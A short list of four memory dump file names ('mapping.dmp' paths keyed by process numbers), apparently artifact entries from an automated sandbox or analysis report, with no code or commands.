memory/1448-152-0x0000000000000000-mapping.dmp

memory/1728-153-0x0000000000000000-mapping.dmp

memory/1412-154-0x0000000000000000-mapping.dmp

memory/1524-156-0x0000000000000000-mapping.dmp